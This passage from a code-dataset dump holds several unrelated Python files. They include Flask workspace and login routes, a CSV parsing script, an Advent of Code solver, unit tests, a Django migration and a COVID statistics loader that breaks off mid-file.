False)\n","sub_path":"addFeatures.py","file_name":"addFeatures.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"438272499","text":"from . import interfaces\n\ndef discoverBackends():\n\timport pkg_resources\n\tpts = list(pkg_resources.iter_entry_points(group=\"file_2_package\"))\n\treturn dict(( (b.name, b) for b in pts ))\n\ndiscoveredBackends = discoverBackends()\n\ndef selectBackend(name:str):\n\tb = discoveredBackends[name]\n\tinit = b.load()\n\tcls = init(interfaces)\n\tcls.ID = name\n\treturn cls\n","sub_path":"File2Package/BackendsDiscoverer.py","file_name":"BackendsDiscoverer.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"62722446","text":"from . 
import user as userActions\nimport app.dbModels as dbModels\nimport app.errors as errors\nfrom datetime import datetime\nimport sqlalchemy.exc as SQLErrors\n\n# importing related models from database\nUserAccount = dbModels.UserAccount\nUserProfile = dbModels.UserProfile\nWorkspace = dbModels.Workspace\nOwnership = dbModels.Ownership\n\ndef getAllWorkspaces(db):\n    workspaces = Workspace.query.all()\n    return workspaces\n\ndef getAllOwnerships(db):\n    ownerships = Ownership.query.all()\n    return ownerships\n\ndef getOwnershipsOfWorkspace(db, workspaceID, role = 'ALL'):\n    if not workspaceID:\n        raise errors.DBExceptions.MissingCredentialFields\n\n    ownerships = []\n    if role == 'ALL':\n        ownerships = Ownership.query.filter_by(workspaceID = workspaceID).all()\n    else:\n        ownerships = Ownership.query.filter_by(workspaceID = workspaceID, role = role).all()\n\n    return ownerships\n\ndef getUserWorkspaces(db, userID):\n    userActions.getUserByID(db, userID)\n    ownerships = Ownership.query.filter_by(userID = userID).all()\n\n    return [ownership.workspace for ownership in ownerships]\n\ndef getWorkspaceByID(db, userID, workspaceID):\n    if not workspaceID:\n        raise errors.DBExceptions.MissingCredentialFields\n\n    userActions.getUserByID(db, userID)\n    ownership = Ownership.query.filter_by(userID = userID, workspaceID = workspaceID).first()\n    \n    if ownership:\n        return ownership.workspace\n    \n    raise errors.DBExceptions.NotAuthorized\n    \ndef checkWorkspaceOwnership(db, ownerID, workspaceID):\n    if not (ownerID and workspaceID):\n        raise errors.DBExceptions.MissingCredentialFields\n    \n    workspace = Workspace.query.filter_by(ownerID = ownerID, id = workspaceID).first()\n    if not workspace:\n        raise errors.DBExceptions.NotAuthorized\n    \n    return workspace\n\ndef createWorkspace(db, userID, filename):\n    if not (db and userID and filename):\n        raise errors.DBExceptions.MissingCredentialFields\n\n    user = userActions.getUserByID(db, userID)\n\n    try:\n        newWorkspace = Workspace(filename = filename, ownerID = userID, owner = user.profile)\n\n        db.session.add(newWorkspace)\n        db.session.flush()\n\n        newOwnership = Ownership(role = 'OWNER', userID = userID, user = user.profile, workspaceID = newWorkspace.id, workspace = newWorkspace)\n        db.session.add(newOwnership)\n        db.session.commit()\n\n        return newWorkspace\n    except SQLErrors.IntegrityError:\n        raise errors.DBExceptions.UniqueRoleForWorkspace\n\ndef createOwnership(db, ownerID, workspaceID, targetUserID):\n    if not (targetUserID and ownerID and workspaceID):\n        raise errors.DBExceptions.MissingCredentialFields\n\n    workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n    targetUser = UserAccount.query.filter_by(profile_id = targetUserID).first()\n    if not targetUser:\n        raise errors.DBExceptions.RecordNotExisted\n\n    try:\n        newOwnership = Ownership(userID = targetUserID, user = targetUser.profile, workspaceID = workspace.id, workspace = workspace)\n        \n        db.session.add(newOwnership)\n        db.session.commit()\n\n        return True\n    except SQLErrors.IntegrityError:\n        raise errors.DBExceptions.UniqueRoleForWorkspace\n\ndef updateWorkspaceFilename(db, ownerID, workspaceID, newFilename):\n    if not (ownerID and workspaceID and newFilename):\n        raise errors.DBExceptions.MissingCredentialFields\n\n    workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n    workspace.filename = newFilename\n    db.session.commit()\n\n    return True\n\ndef swapWorkspaceOwnership(db, ownerID, workspaceID, userID):\n    if not (ownerID and userID and workspaceID):\n        raise errors.DBExceptions.MissingCredentialFields\n\n    
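# checkWorkspaceOwnership below raises NotAuthorized unless the caller currently owns the workspace\n    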
targetWorkspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n\n    # assign the ownership\n    targetUser = userActions.getUserByID(db, userID)\n    targetWorkspace.ownerID = userID\n    targetWorkspace.owner = targetUser\n    \n    # swap roles (.first() is needed so we get the Ownership rows themselves, not Query objects)\n    ownerOwnership = Ownership.query.filter_by(userID = ownerID, workspaceID = workspaceID).first()\n    userOwnership = Ownership.query.filter_by(userID = userID, workspaceID = workspaceID).first()\n\n    tempRole = ownerOwnership.role\n    ownerOwnership.role = userOwnership.role\n    userOwnership.role = tempRole\n\n    db.session.commit()\n    return True\n\ndef deleteWorkspace(db, ownerID, workspaceID):\n    if not (ownerID and workspaceID):\n        raise errors.DBExceptions.MissingCredentialFields\n    \n    workspace = checkWorkspaceOwnership(db, ownerID, workspaceID)\n    db.session.delete(workspace)\n    db.session.commit()\n\n    return True\n\ndef deleteOwnership(db, userID, workspaceID):\n    if not (userID and workspaceID):\n        raise errors.DBExceptions.MissingCredentialFields\n\n    ownership = Ownership.query.filter_by(workspaceID = workspaceID, userID = userID).first()\n    if not ownership:\n        raise errors.DBExceptions.UniqueRoleForWorkspace\n    \n    if ownership.role == \"OWNER\":\n        return deleteWorkspace(db, userID, workspaceID)\n    else:\n        db.session.delete(ownership)\n        db.session.commit()\n        return True","sub_path":"Server/app/actions/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"206079083","text":"import re\r\nimport sys\r\nimport argparse\r\n\r\n# Open file objects\r\nparser = argparse.ArgumentParser( description='Process replacement of thread names' )\r\nparser.add_argument( '-t', '--thread', metavar='threadFile', required=True, help='Thread file from KWD output log' )\r\nparser.add_argument( '-m', '--monitor', metavar='monitorReport', required=True, help='Report file from Performance Monitor' )\r\nparser.add_argument( '-o', '--out', metavar='outputFile', nargs='?', help='Output csv file' )\r\nargs = parser.parse_args()\r\nfT = open( args.thread, 'r' )\r\nfM = open( args.monitor, 'r' )\r\ntry:\r\n    fO = open( args.out, 'w' ) if args.out else sys.stdout\r\nexcept IOError:\r\n    # Open args.out file error\r\n    fO = sys.stdout\r\n\r\n# Parse thread log\r\n# print(\"From {}\".format(args.thread), end='\\r\\n')\r\npLog = re.compile( r\".*Thread Start \\( name: (.*) id: (.*) p: (.*)\" )\r\nadrsList = []\r\nnameList = []\r\nidx = 0\r\nfor line in fT:\r\n    m = pLog.match( line )\r\n    if m:\r\n        address = int( m.group(2), 16 )\r\n        adrsList.append( str(address) )\r\n        nameList.append( m.group(1) )\r\n        print( \"{0}, {1}\".format(adrsList[idx], nameList[idx]), end='\\r\\n' )\r\n        idx = idx + 1\r\n\r\n# Replace csv report\r\n# print(\"From {}\".format(args.monitor), end='\\r\\n')\r\npName = re.compile( r\"GRM_Nav\" )\r\npID = re.compile( r\"ID Thread\" )\r\nlist1 = []\r\nlist2 = []\r\nfor line in fM:\r\n    gotName = pName.search( line )\r\n    gotID = pID.search( line )\r\n    if gotName:\r\n        # Name list\r\n        list1 = line.split( ',' )\r\n        list1.remove('\\n')\r\n    elif gotID:\r\n        # ID list\r\n        for i in range( idx ):\r\n            line = line.replace( adrsList[i], nameList[i] )\r\n        line = line.replace( \".000\", \"\" )\r\n        list2 = line.split( ',' )\r\n        list2.remove('\\n')\r\n    else:\r\n        # Other lines\r\n        fO.write( line )\r\n\r\ntemp = zip( list1, list2 )\r\nfor i in temp:\r\n    fO.write( \"{0}, {1}\\n\".format(i[0], i[1]) )\r\n\r\n# Close file objects\r\nfT.close()\r\nfM.close()\r\nif fO != sys.stdout:\r\n    
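# close the output handle only when a real file was opened; sys.stdout itself must stay open\r\n    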
fO.close()\r\n","sub_path":"others/garmin/CPU_profile/parse-csv.py","file_name":"parse-csv.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"135415300","text":"import unittest\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n# logging\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\n# module imports\nfrom malcolm.controllers.hellocontroller import HelloController\nfrom malcolm.core.block import Block\nfrom malcolm.core.process import Process\nfrom malcolm.core.syncfactory import SyncFactory\nfrom malcolm.core.request import Request\n\n\nclass TestSystemCore(unittest.TestCase):\n\n    def test_hello_controller_good_input(self):\n        block = Block(\"hello\")\n        HelloController(block)\n        result = block.say_hello(name=\"me\")\n        self.assertEqual(result[\"greeting\"], \"Hello me\")\n\n    def test_hello_controller_with_process(self):\n        sync_factory = SyncFactory(\"sched\")\n        process = Process(\"proc\", sync_factory)\n        block = Block(\"hello\")\n        HelloController(block)\n        process.add_block(block)\n        process.start()\n        q = sync_factory.create_queue()\n        req = Request.Post(response_queue=q, context=\"ClientConnection\",\n                           endpoint=[\"hello\", \"say_hello\"],\n                           parameters=dict(name=\"thing\"))\n        req.set_id(44)\n        process.q.put(req)\n        resp = q.get(timeout=1)\n        self.assertEqual(resp.id_, 44)\n        self.assertEqual(resp.context, \"ClientConnection\")\n        self.assertEqual(resp.type_, \"Return\")\n        self.assertEqual(resp.value, dict(greeting=\"Hello thing\"))\n\nif __name__ == \"__main__\":\n    unittest.main(verbosity=2)\n","sub_path":"tests/test_core/test_system_core.py","file_name":"test_system_core.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"296981686","text":"import os, re\nfrom model import *\nfrom flask import Flask, session, request, flash, url_for, redirect, render_template, abort, jsonify\n# import flask_login\nfrom flask_login import LoginManager, login_user, logout_user, current_user # login_required is not imported because a custom decorator of the same name is defined below\nfrom functools import wraps\n\n\napp = Flask(__name__)\n\ndef login_required(userinput):\n\t@wraps(userinput)\n\tdef wrap(*args, **kwargs):\n\t\tif 'logged_in' in session:\n\t\t\treturn userinput(*args, **kwargs)\n\t\telse:\n\t\t\tflash(\"You need to login first.\")\n\t\t\treturn redirect('/login')\n\treturn wrap\n\n# =====================================================================================================\n# Routes ==============================================================================================\n# =====================================================================================================\n\n@app.route(\"/\", methods=['POST','GET'])\ndef index():\n\temail = ''\n\tif session.get('logged_in'):\n\t\temail = session.get('email')\n\t\tprint(\"session logged in = true\")\n\t\treturn redirect(\"/home\")\n\telse:\n\t\tprint(\"session logged in = false\")\n\t\treturn redirect(\"/login\")\n\n@app.route(\"/dashboard\", methods=['POST','GET'])\n@login_required\ndef dashboard():\n\ttitle = \"Main Dashboard\"\n\treturn render_template(\"main.html\",\n\t\ttitle = title)\n\n@app.route(\"/login\", methods=['POST','GET'])\ndef login():\n\terror_msg = \"\"\n\tif request.method == 'POST':\n\t\temail = request.form.get('email')\n\t\tpassword = request.form.get('password')\n\t\tuser = 
User.query.filter_by(email=email).first()\n\t\tprint(\"email:\", email)\n\t\tprint(\"user:\", user)\n\t\tif user:\n\t\t\tprint(\"user.check_password(password):\", user.check_password(password))\n\t\t\tif user.check_password(password):\n\t\t\t\tsession['logged_in'] = True\n\t\t\t\tsession['firstname'] = user.firstname\n\t\t\t\tsession['id'] = user.id\n\t\t\t\tprint(\"/Login: successfully logged in\")\n\t\t\t\treturn redirect('/home')\n\t\terror_msg = \"Incorrect email/password. Please try again.\"\n\treturn render_template(\"login.html\", error_msg = error_msg)\n\n\n@app.route(\"/register\", methods = ['GET', 'POST'])\ndef register():\n\tif request.method == 'GET':\n\t\treturn render_template('register.html')\n\tuser = User(request.form['email'], request.form['password'], request.form['firstname'], request.form['lastname'])\n\tdb.session.add(user)\n\tdb.session.commit()\n\tprint(\"User successfully added.\")\n\treturn redirect('/login')\n\n@app.route(\"/logout\")\n@login_required\ndef logout():\n\tsession.clear()\n\tprint(\"User logged out.\")\n\treturn redirect('/login')\n\n@app.route(\"/home\", methods=['GET','POST'])\n@login_required\ndef home():\n\treturn render_template('home.html')\n\n\n@app.route(\"/org_dashboard\", methods=['GET','POST'])\n@login_required\ndef org_dashboard():\n\ttitle = \"Original Dashboard\"\n\treturn render_template(\"org_dashboard.html\",\n\t\ttitle = title)\n\n@app.route(\"/proforma\", methods=['GET','POST'])\n@login_required\ndef proforma():\n\ttitle = \"Pro Forma\"\n\treturn render_template(\"proforma.html\",\n\t\ttitle=title)\n\n@app.route('/returns_summary', methods=['GET','POST'])\n@login_required\ndef return_sum():\n\ttitle = \"Returns Summary\"\n\treturn render_template('returns_summary.html',\n\t\ttitle=title)\n\n@app.route('/inputform')\n@login_required\ndef inputForm():\n\ttitle=\"Input Form\"\n\treturn render_template('input_form.html',\n\t\ttitle = title)\n\n@app.route('/savedata',methods = [\"POST\"])\n@login_required\ndef save_data():\n\tprint('='*50+\" start save\")\n\tobject1 = 'object'\n\tmarket_counter = 1\n\tmarket_rental_input_counter = 1\n\trental_rate_counter = 1\n\t# rental rate lists\n\tproj_rents_list = []\n\ttotal_units_list = []\n\tavg_sf_per_unit_list = []\n\trent_per_unit_list = []\n\t# market rental lists\n\trevenue_list = []\n\texpenses_list = []\n\tvacancy_list = []\n\tconcession_list = []\n\tcredit_loss_list = []\n\t# static inputs\n\tsave = RealEstateModel(datetime.utcnow(),\n\t\t\t\trequest.form['save_name'],\n\t\t\t\trequest.form['Analysis_Start_Date'],\n\t\t\t\trequest.form['Property_Name'],\n\t\t\t\trequest.form['Property_Address'],\n\t\t\t\trequest.form['Property_Type'],\n\t\t\t\trequest.form['Purchase_Price'],\n\t\t\t\trequest.form['Closing_Costs_Percentage'],\n\t\t\t\trequest.form['Sale_Year'],\n\t\t\t\trequest.form['Terminal_Cap_Rate'],\n\t\t\t\trequest.form['Sales_Costs'],\n\t\t\t\trequest.form['Leverage'],\n\t\t\t\trequest.form['Interest_Rate_on_Mortgage'],\n\t\t\t\trequest.form['Loan_Term'],\n\t\t\t\trequest.form['Loan_Amortization'],\n\t\t\t\t'5',# request.form['UL_Discount_Rate'],\n\t\t\t\t'8',# 
request.form['L_Discount_Rate'],\n\t\t\t\trequest.form['Other_Income_Total'],\n\t\t\t\trequest.form['Less_Vacancy'],\n\t\t\t\trequest.form['Less_Concessions'],\n\t\t\t\trequest.form['Less_Credit_Loss'],\n\t\t\t\trequest.form['Real_Estate_Taxes_Total'],\n\t\t\t\trequest.form['Insurance_Total'],\n\t\t\t\trequest.form['Utilities_Total'],\n\t\t\t\trequest.form['Payroll_Total'],\n\t\t\t\trequest.form['Repairs_and_Maintenance_Total'],\n\t\t\t\trequest.form['Contract_Services_Total'],\n\t\t\t\trequest.form['Turnover_Total'],\n\t\t\t\trequest.form['Sales_and_Marketing_Total'],\n\t\t\t\trequest.form['Administrative_Total'],\n\t\t\t\trequest.form['Management_Percentage'],\n\t\t\t\trequest.form['Replacement_Reserves_Percentage'],\n\t\t\t\tsession['id'])\n\n\tdb.session.add(save)\n\t# db.session.commit()\n\n\n\n\twhile True:\n\t\tif not request.form.get('total_units'+str(rental_rate_counter)):\n\t\t\tbreak\n\t\tproj_rents_list.append(request.form['proj_rents'+str(rental_rate_counter)])\n\t\ttotal_units_list.append(request.form['total_units'+str(rental_rate_counter)])\n\t\tavg_sf_per_unit_list.append(request.form['avg_sf_per_unit'+str(rental_rate_counter)])\n\t\trent_per_unit_list.append(request.form['rent_per_unit'+str(rental_rate_counter)])\n\t\trental_rate_counter += 1\n\n\twhile True:\n\t\tif not request.form.get('mkt_rent_revenue'+str(market_counter)):\n\t\t\tprint('break')\n\t\t\tbreak\n\t\trevenue_list.append(request.form['mkt_rent_revenue'+str(market_counter)])\n\t\texpenses_list.append(request.form['mkt_rent_expenses'+str(market_counter)])\n\t\tvacancy_list.append(request.form['mkt_rent_vacancy'+str(market_counter)])\n\t\tconcession_list.append(request.form['mkt_rent_concessions'+str(market_counter)])\n\t\tcredit_loss_list.append(request.form['mkt_rent_credit_loss'+str(market_counter)])\n\t\tmarket_counter += 1\n\t\tprint(market_counter)\n\n\n\tprint('proj_rents_list: ',proj_rents_list)\n\tprint('total_units_list: ',total_units_list)\n\tprint('avg_sf_per_unit_list: ',avg_sf_per_unit_list)\n\tprint('rent_per_unit_list: ',rent_per_unit_list)\n\n\t# while market_rental_input_counter <= len(revenue_list):\n\n\n\tprint('revenue_list: ',revenue_list)\n\tprint('expenses_list: ',expenses_list)\n\tprint('vacancy_list: ',vacancy_list)\n\tprint('concession_list: ',concession_list)\n\tprint('credit_loss_list: ',credit_loss_list)\n\n\treturn jsonify(success = 'success')\n\n\n\n\nif __name__ == \"__main__\":\n\tapp.secret_key = os.urandom(12)\n\tapp.run(port=3000,debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"618649446","text":"instructions = open('day7.txt', 'r').read().split('\\n')\n\nnodes = []\nfor instruction in instructions:\n\tnodes.append([instruction.split(' ')[-1], None])\n\ndef nodeValue( str ):\n\tfor node in nodes:\n\t\tif node[0] == str:\n\t\t\treturn node[1]\n\ndef nodeIndex( str ):\n\tindex = 0\n\tfor node in nodes:\n\t\tif node[0] == str:\n\t\t\treturn index\n\t\tindex += 1\n\nwhile ([value for node in nodes for value in node].count(None)) > 0:\n\tfor instruction in instructions:\n\t\twords = instruction.split(' ')\n\t\tif (nodeValue(words[-1]) == None):\n\t\t\tif (len(words) == 3):\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[0])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[0])\n\t\t\t\tnodes[nodeIndex(words[2])][1] = input1\n\t\t\telif (len(words) == 4):\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[1])\n\t\t\t\texcept 
ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[1])\n\t\t\t\tnodes[nodeIndex(words[3])][1] = None if (input1 == None) else (65535 - int(input1))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tinput1 = int(words[0])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput1 = nodeValue(words[0])\n\t\t\t\ttry:\n\t\t\t\t\tinput2 = int(words[2])\n\t\t\t\texcept ValueError:\n\t\t\t\t\tinput2 = nodeValue(words[2])\n\t\t\t\tif (words[1]=='OR'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if ((input1 == None) | (input2 == None)) else (int(input1) | int(input2))\n\t\t\t\telif (words[1]=='AND'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if ((input1 == None) | (input2 == None)) else (int(input1) & int(input2))\n\t\t\t\telif (words[1]=='LSHIFT'):\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if (input1 == None) else (int(input1) << input2)\n\t\t\t\telse:\n\t\t\t\t\tnodes[nodeIndex(words[4])][1] = None if (input1 == None) else (int(input1) >> input2)\n\t#print ([value for node in nodes for value in node].count(None))\nprint (nodeValue('a'))","sub_path":"adventcode_day7a.py","file_name":"adventcode_day7a.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"505313134","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on 3 Mar 2019\n\n@author: Bruno Beloff (bruno.beloff@southcoastscience.com)\n\nsource repo: scs_analysis\n\nDESCRIPTION\nThe sample_duplicates utility is used to find duplicate values in a sequence of input JSON documents, optionally\nfor a specified node path. It is particularly useful in searching for duplicate recording datetimes.\n\nIf an input document does not contain the specified path, then it is ignored.\n\nIn the default mode, the utility outputs the rows that were duplicates (or contained duplicate field values). 
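When a path is given, documents are compared on the value at that path, so two rows can count as duplicates even when their other fields differ. 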
If the\n--exclude flag is set, then sample_duplicates generates a version of the input data that contains no duplicates.\n\nIn the --counts mode, the output report is sequence of JSON dictionaries with a field for each value where duplicates\nwere found, whose value is the number of matching documents.\n\nSYNOPSIS\nsample_duplicates.py [{ -x | -c }] [-v] [PATH]\n\nEXAMPLES\ncsv_reader.py climate.csv | sample_duplicates.py -v val.hmd\n\nDOCUMENT EXAMPLE - OUTPUT\ndefault mode:\n{\"val\": {\"hmd\": 17.5, \"tmp\": 25.7}, \"rec\": \"2019-02-25T15:28:18Z\", \"tag\": \"scs-bgx-303\"}\n{\"val\": {\"hmd\": 17.5, \"tmp\": 25.7}, \"rec\": \"2019-02-25T15:31:18Z\", \"tag\": \"scs-bgx-303\"}\n\ncounts mode:\n{\"17.5\": 2}\n\"\"\"\n\nimport sys\n\nfrom scs_analysis.cmd.cmd_sample_duplicates import CmdSampleDuplicates\n\nfrom scs_core.data.duplicates import Duplicates\nfrom scs_core.data.path_dict import PathDict\n\nfrom scs_core.sys.logging import Logging\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n dupes = None\n\n document_count = 0\n processed_count = 0\n\n # ----------------------------------------------------------------------------------------------------------------\n # cmd...\n\n cmd = CmdSampleDuplicates()\n\n if not cmd.is_valid():\n cmd.print_help(sys.stderr)\n exit(2)\n\n Logging.config('sample_duplicates', verbose=cmd.verbose)\n logger = Logging.getLogger()\n\n logger.info(cmd)\n\n try:\n # ------------------------------------------------------------------------------------------------------------\n # resources...\n\n dupes = Duplicates()\n non_dupes = []\n\n # ------------------------------------------------------------------------------------------------------------\n # run...\n\n for line in sys.stdin:\n jstr = line.strip()\n datum = PathDict.construct_from_jstr(jstr)\n\n if datum is None:\n continue\n\n document_count += 1\n\n if not datum.has_sub_path(cmd.path):\n continue\n\n is_duplicate = dupes.test(document_count, datum.node(cmd.path), datum)\n\n if not cmd.counts:\n if cmd.exclude:\n if not is_duplicate:\n non_dupes.append(jstr)\n else:\n if is_duplicate:\n print(jstr)\n\n processed_count += 1\n\n\n # ------------------------------------------------------------------------------------------------------------\n # report...\n\n if cmd.exclude:\n for datum in non_dupes:\n print(datum)\n\n if cmd.counts:\n for count in dupes.match_counts():\n print(count)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # end...\n\n except KeyboardInterrupt:\n print(file=sys.stderr)\n\n finally:\n logger.info(\"documents: %d processed: %d\" % (document_count, processed_count))\n logger.info(\"values with duplicates: %d total duplicates: %d\" % (dupes.matched_key_count, dupes.total_matches))\n","sub_path":"src/scs_analysis/sample_duplicates.py","file_name":"sample_duplicates.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"194117979","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('kontrahent', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Catkli',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, 
auto_created=True)),\n ('nazwa', models.CharField(max_length=60, default='gotówka')),\n ('slug', models.SlugField(blank=True, max_length=66)),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.CreateModel(\n name='Detale',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('rabatz', models.DecimalField(blank=True, max_digits=4, decimal_places=2)),\n ('rabatr', models.DecimalField(blank=True, max_digits=4, decimal_places=2)),\n ('kredytlimit', models.DecimalField(blank=True, max_digits=8, decimal_places=2)),\n ('peyment', models.PositiveIntegerField(blank=True, default=0)),\n ],\n ),\n migrations.CreateModel(\n name='Klient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('nazwa', models.CharField(db_index=True, blank=True, max_length=30)),\n ('slug', models.SlugField(blank=True)),\n ('firma', models.CharField(max_length=80)),\n ('adres', models.CharField(max_length=60)),\n ('kodpocztowy', models.CharField(max_length=6)),\n ('rodzfirm', models.CharField(choices=[('działalność', 'Jednoosobowa działalność gospodarcza'), ('spółka cywilna', 'Spółka cywilna'), ('spółka jawna', 'Spółka jawna'), ('spółka komandytowa', 'Spółka komandytowa'), ('spółka zoo', 'Spółka z.o.o'), ('spółka akcyjna', 'Spółka akcyjna')], max_length=60, default='działalność')),\n ('nip', models.CharField(max_length=10)),\n ('krs', models.CharField(blank=True, max_length=10)),\n ('ceidg', models.CharField(blank=True, max_length=10)),\n ('regon', models.CharField(blank=True, max_length=9)),\n ('shortopis', models.CharField(blank=True, max_length=200)),\n ('opis', models.TextField(blank=True)),\n ('link2', models.URLField(blank=True)),\n ('status', models.CharField(choices=[('aktywny', 'aktywny'), ('ban', 'ban')], max_length=20, default='aktywny')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('catkli', models.ForeignKey(to='klient.Catkli', related_name='klients')),\n ('miejscowosc', models.ForeignKey(related_name='klientos', blank=True, to='kontrahent.Miejscowosc')),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.CreateModel(\n name='Lokacja',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('nazwa', models.CharField(db_index=True, max_length=40)),\n ('slug', models.SlugField(blank=True)),\n ('adres', models.CharField(max_length=60)),\n ('kodpocztowy', models.CharField(max_length=6)),\n ('dzienodciecia', models.CharField(max_length=15)),\n ('godzdostawy', models.CharField(max_length=15)),\n ('shortopis', models.CharField(blank=True, max_length=100)),\n ('link1', models.URLField(blank=True)),\n ('link2', models.URLField(blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('klient', models.ForeignKey(to='klient.Klient', related_name='lokacjas')),\n ('miejscowosc', models.ForeignKey(related_name='lokacjas', blank=True, to='kontrahent.Miejscowosc')),\n ],\n options={\n 'ordering': ('nazwa',),\n },\n ),\n migrations.AddField(\n model_name='detale',\n name='klient',\n field=models.OneToOneField(related_name='detales', to='klient.Klient'),\n ),\n ]\n","sub_path":"klient/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} 
+{"seq_id":"638659119","text":"import json\nimport requests\nimport os\nimport MySQLdb\nfrom datetime import datetime, timedelta\n \n#\thttps://likegeeks.com/downloading-files-using-python/\n#\thttps://stackoverflow.com/questions/12965203/how-to-get-json-from-webpage-into-python-script\n#\thttps://mysqlclient.readthedocs.io/user_guide.html\n#\thttps://stackoverflow.com/questions/441147/how-to-subtract-a-day-from-a-date\n\n# JSON date not older than 2 day is not accurate and can change\ndateToInsert = datetime.today() - timedelta(days=2)\ndateToInsert = dateToInsert.strftime('%Y-%m-%d')\n\n\nurlCase = \"https://epistat.sciensano.be/Data/COVID19BE_CASES_AGESEX.json\"\nurlHosp = \"https://epistat.sciensano.be/Data/COVID19BE_HOSP.json\"\nurlDeath = \"https://epistat.sciensano.be/Data/COVID19BE_MORT.json\"\nurlTest = \"https://epistat.sciensano.be/Data/COVID19BE_tests.json\"\n\n\n\ndb = MySQLdb.connect(host=\"127.0.0.1\",db=\"coviddb\", read_default_file=\"/etc/mysql/my.cnf\");\ncur = db.cursor()\n\n\ndef url_getJSON(url):\n try:\n with requests.get(url) as r:\n data = r.json()\n return data\n except:\n print(f\"Error loading {url}\")\n exit()\t\n\n\ndef getProvinceID(provinceName):\n\tcur.execute(f'SELECT provinceID FROM provinces WHERE provinceName = \\'{provinceName}\\'')\n\tresult = cur.fetchone()\n\treturn result[0]\n\t\n\t\ndef getRegionID(regionName):\n\tcur.execute(f'SELECT regionID FROM regions WHERE regionName = \\'{regionName}\\'')\n\tresult = cur.fetchone()\n\treturn result[0]\n\n# ------------------------------\n# Start function read json tests \ndef readTest():\n\tdataset = url_getJSON(urlTest)\n\t# Iteratie through every JSON object\n\tfor data in dataset:\n\t\ttry:\n\t\t\tdate = data['DATE']\n\t\t\ttestAll = data['TESTS_ALL']\n\t\t\ttestPos = data['TESTS_ALL_POS']\n\t\t\t# If an error occurs in reading the JSON, stop the reading\n\t\t\t\n\t\t\t# If the key 'PROVINCE' exists\n\t\t\tif ('PROVINCE' in data):\n\t\t\t\t# Get provinceID & regionID\n\t\t\t\tprovinceID = getProvinceID(data['PROVINCE'])\n\t\t\t\tregionID = getRegionID(data['REGION'])\n\t\t\t\t\t\n\n\t\t\t\t#Check if the object already exists\n\t\t\t\tsql = 'SELECT * FROM tests WHERE testDate = %s AND testProvinceID = %s AND testRegionID = %s'\n\t\t\t\tval = (date,provinceID,regionID)\n\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\n\t\t\t\t# If the object does not exists, insert into db\n\t\t\t\tif (cur.rowcount == 0):\n\t\t\t\t\t# Check if date is older than 2 days from now\n\t\t\t\t\tif (date < dateToInsert):\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsql = \"INSERT INTO tests(testDate,testProvinceID,testRegionID,testAll,testPos) VALUES (%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t\tval = (date,provinceID,regionID,testAll,testPos)\n\t\t\t\t\t\t\tcur.execute(sql,val)\n\t\t\t\t\t\t\tdb.commit()\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tprint(\"Error (101) - inserting test\")\n\t\t\t\t\t\t\t\n\t\t\t# If regionID & provinceID do not exist\n\t\t\telse:\n\t\t\t\t#Check if object exists\n\t\t\t\tsql = \"SELECT * FROM tests WHERE testDate = %s AND testProvinceID = %s AND 